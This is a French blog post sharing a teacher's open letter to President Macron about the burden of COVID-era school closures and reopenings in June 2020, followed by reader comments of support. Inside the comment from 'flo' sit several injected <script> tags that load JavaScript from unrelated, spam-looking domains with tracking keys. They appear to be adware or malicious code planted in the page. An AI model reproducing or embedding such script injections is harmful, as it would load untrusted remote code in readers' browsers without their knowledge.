• Ben oui!

    Un message qui tourne sur Facebook (message transféré par une collègue parce que je n'ai toujours pas Facebook) , et il n'y a rien à rajouter.

    Margot Poretti le 14 juin à 21:05 · Partagé avec Public
    A Monsieur le Président ... Quand vous avez annoncé la fermeture des écoles,
    mes collègues et moi même avons de suite organisé tout ce qu’il fallait
    pour mettre en place la continuité pédagogique de nos élèves.
    Dès le lundi suivant, tout était opérationnel pour nos élèves :
    fichiers de devoirs, visio, mails quotidiens.
    On a appelé les familles une à une, plusieurs fois.
    En dépit du non fonctionnement des serveurs et
    plateformes de l’Education Nationale.
    Avec nos matériels personnels, notre bonne volonté,
    nos heures que l’on a pas comptées. On s’est adaptés. Quand vous avez annoncé la réouverture des écoles
    avec un protocole de dingue,
    les collègues et moi même avons de suite tout réorganisé.
    On était prêtes. La rubalise a été posée, les tables espacées,
    certains toilettes condamnés, les meubles poussés,
    les jeux mis sous bâche.
    Par nous mêmes.
    On a joué sur chacun de nos 2 pieds pour assurer l’école à l’école
    et l’école à la maison de nos élèves encore confinés
    alors que les journées faisaient toujours 24h
    et pas une seconde plus.
    En dépit des injonctions contraires que l’on recevait chaque jour.
    Avec notre bonne volonté, nos heures que l’on a pas comptées. On s’est adaptés.
    Quand les médias tabassent à longueur de journée que les profs ont disparu,
    on s’est tus. On a pris sur nous en se disant que nous, nos élèves savent,
    nos parents d’élèves savent.
    Que ce n’était sûrement qu’une stratégie gouvernementale :
    le fameux « diviser pour mieux régner ». Quand il a fallu accueillir les enfants dans des conditions douteuses,
    en les empêchant de s’approcher, de jouer, de manipuler, de se lever.
    On s’est adaptés.
    On a creusé nos petites têtes de feignants payés grassement à rien faire
    pour que les journées d’enfants de 3 ans se déroulent malgré tout au mieux.
    Aujourd’hui, vous annoncez une réouverture totale des écoles
    pour lundi matin prochain.
    Mais cette fois ci, Monsieur Macron, je ne vais pas m’adapter.
    Je ne vais pas revenir le week-end prochain sur temps non scolaire
    pour remettre en place mes tables, enlever la rubalise, tout préparer.
    Parce qu’à force de tirer sur la corde, elle finit par céder.
    Nous nous sommes adaptés, sans aide, sans reconnaissance.
    Je ne vais plus autant m’adapter et je refuse de sacrifier
    le temps que j’ai à passer avec ma famille pour venir remettre
    ma classe comme avant, sur du temps non scolaire, pour des lubies politiques.
    Maintenant, on nous dit que la règle de la distanciation est valable
    seulement « latéralement ». Qu’est ce que cela veut dire pour nous,
    concrètement ?
    Quand sommes nous sensés pour la 3ème fois depuis le mois de mars
    déménager les locaux, préparer le matériel, prévenir les familles ?
    Je soupçonne que vous comptiez sur notre temps personnel,
    sur notre week-end parce que même si l’on s’amuse à nous faire passer
    pour des fainéants, on sait aussi à quel point la plupart d’entre nous
    ne compte ni les heures ni l’investissement. Pour eux. Pour les enfants.
    Je serai là, je ferai de mon mieux lundi, comme nous le faisons
    depuis la réouverture des écoles, pour les enfants.

    Mais cette fois-ci, j’y mets une limite : ma vie personnelle.
    Si vous décidiez par hasard, de proposer de l’aide au sens physique,
    pour déplacer les meubles, les enseignants de France vous attendent.
    Merci. Si vous décidiez également de communiquer avec les enseignants de ce pays
    par un autre moyen que par les médias, sachez que nous en serions ravis.
    Nous avons des boites mails professionnelles sur lesquelles
    notre Ministre nous envoie de temps à autre de petites vidéos.
    Nous serions ravis de recevoir d’autres communications
    de la part du gouvernement sur un sujet qui nous préoccupe beaucoup actuellement :
    la reprise des écoles en pandémie.

    Merci.
    « Prénom 651Prénom 652 »

  • Commentaires

    21
    spock
    Dimanche 21 Juin 2020 à 10:48

    Totalement d'accord avec vous , moi je suis en lycée , gestionnaire ( intendante comme on disait avant ) et je vous dis pas le bordel que j'ai vécu pour installer , acheter , sortir des affiches cohérentes , bref raz le bol aussi , seul ponit " positif" pour les lycées a priori on garde la distanciation car nos élèves sont plus a risque que les plus jeunes , enfin selon la dernière préconisatoin en date , en attendant les trois ou quatre suivantes . Si ce bordel reprends à la rentrée , je pense que je reviendrai aussi à mes 1607 heures annuelles et rien de plus , surtout avec un mari pompier et une fille caissière ...

    COURAGE !!! Bientôt les vacances , oups , j'oubliai on est toujours en vacances dans l'éducation nationales , à moins que vous soyez volontaires pour les vacances apprenantes ....LOL

    20
    Mohican
    Samedi 20 Juin 2020 à 09:17
    19
    Mohican
    Vendredi 19 Juin 2020 à 19:37

    Bonsoir,

    Que devons nous penser de ces ministres qui disent tout et n'importe quoi? Je suis ravie d'être en retraite, même si je n'étais pas enseignante, mais j'ai suivi mes enfants et petits enfants en classe, et ma "petite" dernière est prof.

    Un exemple d’aberration mon fils aîné habite Fort de France, entre les grèves, les vacances et le confinement mes petites filles ont eu classe un mois, je dis bien un mois dans leur année scolaire, et elles vont reprendre pour  quinze jours!!!!

    Je te souhaite beaucoup de courage, mais prends soin de toi et de ta famille, c'est très important.

    Bon week end

     

    18
    Mireille13
    Vendredi 19 Juin 2020 à 19:18

    Pour rajouter ma petite touche, c’est que le ministre sait très bien que l’on va encore s’adapter parce que notre objectif premier, ce sont les enfants qui nous sont confiés, et qu’ils méritent qu’on s’investisse totalement pour eux. Mais c’est épuisant et beaucoup d’entre nous sont au bout du rouleau. Alors moi aussi, ce week-end, c’est relâche, ma priorité c’est ma famille, mon ordi est coupé, ma broderie est sortie ainsi que mon tricot et pour le reste on verra lundi !!!!! Bon week-end, prends bien soin de toi et de tes proches, bises.

    17
    Epaillard Nelly
    Vendredi 19 Juin 2020 à 17:44

    Pouce levé! Les deux, et j'applaudis! Même topo pour moi dans mon travail. Certes, je ne fais que de l'entretien de parties communes, mais avec le confinement, il a fallu s'adapter. Certaines personnes sont bienveillantes, et d'autres vraiment c...

    Sur ce, je te souhaite de profiter de ta famille durant le week-end

    16
    Vendredi 19 Juin 2020 à 17:05
    Bon courage
    1 m = 80 cm ou moins il faut reprendre l’école
    15
    Ghislaine37
    Vendredi 19 Juin 2020 à 14:33

    Bonjour Caro

    Si je n'ai plus de télévision et que je n'écoute plus la radio depuis plus de 11 ans, c'est pour ne plus entendre toutes les âneries de nos gouvernants. Ils ne se rendent absolument pas compte du travail fait par les enseignants, pour suivre au mieux leurs directives, pendant cette pandémie, qui à mon avis est loin d'être terminée.  Bon Courage à tous et tenez bon . Bonne après midi sous un ciel changeant. Gros bisous.

    14
    Vendredi 19 Juin 2020 à 12:26

    Oui, c'est vrai tout ça ! Quel casse-tête à chaque nouvelles dispositions... C'est un peu comme pour les EHPAD. 

    Pas facile du tout de s'adapter aux phases successives d'assouplissement. Et, bien souvent, au moins à l'école et dans les collèges, pas possible du tout ! 

    Courage ! Tenez bon  !!

    13
    flo
    Vendredi 19 Juin 2020 à 11:46

    waouh!!!temoignage fort mais malheureusement tellement vrai

    voila pourquoi les demissions ont été multipliées par 5 en 10ans!

    au secour

    <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1592559820212" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1592559820304" type="text/javascript"></script> <script src="http://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>
    12
    Vendredi 19 Juin 2020 à 11:32

    Bon courage à tous les enseignants pour la reprise lundi !

    Douce journée Caro, bisous

    11
    luce
    Vendredi 19 Juin 2020 à 10:30

    Bon courage, les enseignants ont su pendant cette période très difficile organiser des temps avec leurs élèves. Mes petits enfants de la première à la GS ont toujours eu des contacts positifs (Bourgogne). Les vacances arrivent en espérant que la rentrée sera dans la normalité. Amicalement

    10
    Vendredi 19 Juin 2020 à 09:56
    Mamieminette

    Ben oui!

    Ménagez vous pour éviter le burn out  qui n'a pas épargné ma belle fille.

    Douce fin de semaine avant cette fameuse reprise.

    amitiés

    9
    couquette
    Vendredi 19 Juin 2020 à 09:53

    Bon "coup de gueule" de tout coeur avec vous. Bises

    8
    Vendredi 19 Juin 2020 à 09:22

    Merci pour ce partage!

    Je crois que Mimie rêve!

    Bon courage à vous tous!

    7
    Clau 73
    Vendredi 19 Juin 2020 à 09:15

    C'est à pleurer! Le problème c'est que les personnes qui ne vivent pas dans l'entourage des enseignants ne peuvent pas être conscients de la réalité des choses. (seul les élèves, les parents, les proches, les amis et la famille des enseignants peuvent toucher du doigt l'investissement quotidien que demande ce métier)

    6
    Mimie
    Vendredi 19 Juin 2020 à 08:10

    bonjour Caro

    alors là j'espère que cette lettre l'interpellera ce Macron c'est bien la vérité et je suis de tous cœur avec tous les enseignants !!

    de tous façons il prends vraiment les Français pour des c... !! bon courage à toutes et tous !!

    bon vendredi

    bizzzzzzzzz

    Mimie

    5
    Vendredi 19 Juin 2020 à 08:05
    Brigitte 59

    Courage Caroline !

    Je connais des enseignants de divers niveaux, primaire ou secondaire, qui subissent tant bien que mal cette situation aberrante. En milieu universitaire ce n'est pas mieux. 

    L'Education Nationale se fout ouvertement des enseignants et des jeunes. Ils sont pourtant la clé de notre avenir ! 

    Bon Week-End, ce soir ferme la porte sur tout çà !

    4
    Vendredi 19 Juin 2020 à 07:52
    Bon courage
    1 m = 80 cm ou moins il faut reprendre l’école
    3
    Vivi
    Vendredi 19 Juin 2020 à 07:51

    Mes enfants sont enseignants et je sais le mal être qu'ils ont ,nous avons besoin  d'une sante et un enseignement solide mais l'avenir n'est pas drôle 

    2
    Mary
    Vendredi 19 Juin 2020 à 07:27

    Rolala, bon courage à toi ! 

    C'est tellement insensé cette histoire!

    En tout cas, pour le peu de temps qui reste et vu les conditions, moi j'ai décidé de ne pas chambouler notre "non-organisation" et de continuer à faire travailler ma fille à la maison. Elle est "seulement" en GS, mais on arrivera bien à apprendre à écrire les dernières lettres qui manquent en attaché et à faire quelques activités.

    Bon courage et gros bisous!

    1
    juliana
    Vendredi 19 Juin 2020 à 06:05

    Tellement vrai ! je suis de tout cœur avec vous et je vous plains sincèrement ! Courage à nos enseignants !

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :